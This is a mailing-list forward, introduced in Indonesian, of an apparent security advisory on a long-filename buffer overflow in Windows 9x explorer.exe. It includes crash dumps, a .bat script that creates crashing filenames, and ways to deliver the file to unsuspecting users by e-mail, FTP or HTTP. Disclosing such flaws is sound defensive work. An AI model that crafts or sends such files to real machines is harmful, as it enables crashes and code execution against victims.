From: Dike<[EMAIL PROTECTED]>
All, sekalian sayah forward ajah yah newsnya, maaf kalo panjang :)
Dike
NB: kalo sayah dapet security/bug etc.. news, mau nggak sayah posting ke list? :)
Windows 9x's explorer.exe contains a buffer overflow (long filenames)
--------------------------------------------------------------------------------
SUMMARY
When Microsoft Windows explorer tries to access a filename that contains
more than 129 chars in the extension, a buffer overflow will occur, this
buffer overflow can be exploited to run arbitrary code. Since Explorer is
used by many products as a shell, this vulnerability can be exploited
remotely.
DETAILS
Vulnerable systems:
Windows 95
Windows 98
Windows 98 Second Edition
When Explorer tries to access a filename that contains more than 129 chars
in the extension, a buffer will overflow and you will get an error similar
to this:
EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:
Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161
As you can notice, the EIP was overwritten during this overflow, this
means we can execute code from in the filename.
We can use 247 + 129 + 118 bytes to store data for some shell code. If you
also add some extra special characters to the file, you can cause it to be
recognized as write only in windows (and not found in DOS).
Exploit:
A) Creating such a file
place the following code in a .bat file:
---- cut here
echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.
dir *.* > _�.�------Buffer
overflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)
dir *.* >
_�.�------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678�AAAAAAAAAA
--- cut here
now run the .bat file
B) Using this bug on remote computers:
Eudora Pro mail client:
You could attach the file to an e-mail and send this e-mail to an
unsuspected computer user. When he checks his e-mail an the mail program
attempts to save the attachment to disk, the program will crash cause due
to a buffer overflow.
EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:
FTP Upload, HTTP Download or DCC Sends :
Uploading a file with this name to an FTP server, or placing it in some
HTTP server available for download, will enable an attacker to spread this
file (that can contain arbitrary code) around. An attacker can also use
remote sites' automatic file integrity checks (after a file is uploaded)
to compromise a remote site.
ADDITIONAL INFORMATION
The information was provided by: <mailto:[EMAIL PROTECTED]> Zoa_Chien.
--
Compu-Mania MailingList, provided by PT Centrin Utama
Unsubscribe: [EMAIL PROTECTED], body: unsubscribe Compu-Mania
Archive: http://www.mail-archive.com/[email protected]/
Info: [EMAIL PROTECTED], body: help
